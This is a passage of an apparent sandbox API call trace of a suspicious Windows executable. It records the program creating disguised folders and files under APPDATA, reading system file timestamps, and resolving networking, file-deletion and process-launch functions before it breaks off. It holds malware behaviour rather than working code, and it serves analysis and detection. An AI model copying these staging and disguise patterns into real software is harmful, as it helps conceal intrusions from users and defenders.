!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥩矲狰Ā", cchSrc=256, lpDestStr=0x12ee58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.244] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x12f514, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0fµíõLø\x12", lpUsedDefaultChar=0x0) returned 256 [0031.244] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.244] SetLastError (dwErrCode=0x0) [0031.244] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.245] SetLastError (dwErrCode=0x0) [0031.245] GetLastError () returned 0x0 [0031.246] SetLastError (dwErrCode=0x0) [0031.246] GetLastError () returned 0x0 [0031.246] SetLastError (dwErrCode=0x0) [0031.246] GetLastError () returned 0x0 [0031.256] SetLastError (dwErrCode=0x0) [0031.256] GetLastError () returned 0x0 [0031.256] SetLastError (dwErrCode=0x0) [0031.256] GetLastError () returned 0x0 [0031.256] SetLastError (dwErrCode=0x0) [0031.256] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.257] SetLastError (dwErrCode=0x0) [0031.257] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.258] GetLastError () returned 0x0 [0031.258] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.259] SetLastError (dwErrCode=0x0) [0031.259] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.260] GetLastError () returned 0x0 [0031.260] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.261] SetLastError (dwErrCode=0x0) [0031.261] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.262] SetLastError (dwErrCode=0x0) [0031.262] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.263] SetLastError (dwErrCode=0x0) [0031.263] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.264] GetLastError () returned 0x0 [0031.264] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.265] SetLastError (dwErrCode=0x0) [0031.265] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.266] SetLastError (dwErrCode=0x0) [0031.266] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.267] SetLastError (dwErrCode=0x0) [0031.267] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.268] GetLastError () returned 0x0 [0031.268] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.269] SetLastError (dwErrCode=0x0) [0031.269] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.270] SetLastError (dwErrCode=0x0) [0031.270] GetLastError () returned 0x0 [0031.271] SetLastError (dwErrCode=0x0) [0031.271] GetLastError () returned 0x0 [0031.271] SetLastError (dwErrCode=0x0) [0031.271] GetLastError () returned 0x0 [0031.271] SetLastError (dwErrCode=0x0) [0031.271] GetLastError () returned 0x0 [0031.271] SetLastError (dwErrCode=0x0) [0031.271] GetLastError () returned 0x0 [0031.271] SetLastError (dwErrCode=0x0) [0031.272] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.272] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.272] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.274] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f890 | out: lpSystemTimeAsFileTime=0x12f890*(dwLowDateTime=0xe05c5170, dwHighDateTime=0x1d3dfba)) [0031.275] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f7c8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.275] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f6b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetLastError () returned 0x0 [0031.275] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.276] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.276] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.276] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.276] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.276] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.276] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.276] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.276] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.276] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.276] GetLastError () returned 0xb7 [0031.276] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.276] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.276] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.276] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.277] wsprintfA (in: param_1=0x12f530, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.277] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.277] wsprintfA (in: param_1=0x12f42c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.277] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.277] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.277] CloseHandle (hObject=0x74) returned 1 [0031.277] GetLastError () returned 0x0 [0031.277] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.277] GetLastError () returned 0x0 [0031.277] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.278] GetSystemDirectoryA (in: lpBuffer=0x12f530, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.278] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.278] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.278] CloseHandle (hObject=0x74) returned 1 [0031.278] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.278] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.278] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.280] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.280] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.280] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.280] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.280] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.280] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.281] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.281] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.281] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.282] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.282] GetProcAddress 